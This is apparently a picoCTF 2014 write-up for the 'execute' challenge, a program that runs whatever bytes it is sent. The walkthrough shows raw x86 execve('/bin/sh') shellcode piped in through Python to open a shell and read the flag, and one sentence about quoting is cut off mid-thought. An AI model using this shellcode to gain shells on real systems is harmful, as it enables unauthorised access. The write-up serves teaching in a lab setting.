Created: 2014-11-09 13:07:47
Last modified: 2014-11-17 20:58:07
This program will run whatever you send to it! Try to get the flag! The binary can be found at
/home/execute/ on the shell server. The source can be found here.
You can get the flag in a number of ways, but the easiest would be to run a shell.
Use the program to execute some shellcode.
Let's start by running the program on the server. When we run it and enter
/bin/sh the following appears:
[email protected]:~$ cd /home/execute/ [email protected]:/home/execute$ ./execute /bin/sh Segmentation fault (core dumped) [email protected]:/home/execute$
Huh, that's not good. Looking a little closer at the code we see this:
read(0, buf, 128); ((function_ptr)buf)();
So the program reads in our buffer and executes it. However, it is not executing the buffer as we would expect, with the
system() command to run a command in the shell. Instead, it is executing the assembly commands that we put in the buffer. The hint tells us to run a shell, so we should use
shellcode. Shellcode typically is in the form of a bunch of hex values that can be executed to perform a function such as running
/bin/sh. Many websites provide shellcode, such as shell-storm. For now, let's use this shellcode to run
[email protected]:/home/execute$ ./execute \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80 Segmentation fault (core dumped) [email protected]:/home/execute$
Huh, that still didn't work. Our next task is to
pipe the hex values into the program instead of type them in. Right now, the program interprets
\x31as 4 separate ascii values instead of ascii value
0x31 (or 49 in base 10). To do this we can use Python:
[email protected]:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'") | ./execute [email protected]:/home/execute$
This uses Python to print our hex characters into the program. Note the use of a
" to encapsulate the Python code and the
' to encapsulate the
cat to the end of our Python command, which prevents this.
[email protected]:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | ./execute whoami pico89244 cat flag.txt shellcode_is_kinda_cool
Our shell runs successfully and we get our flag!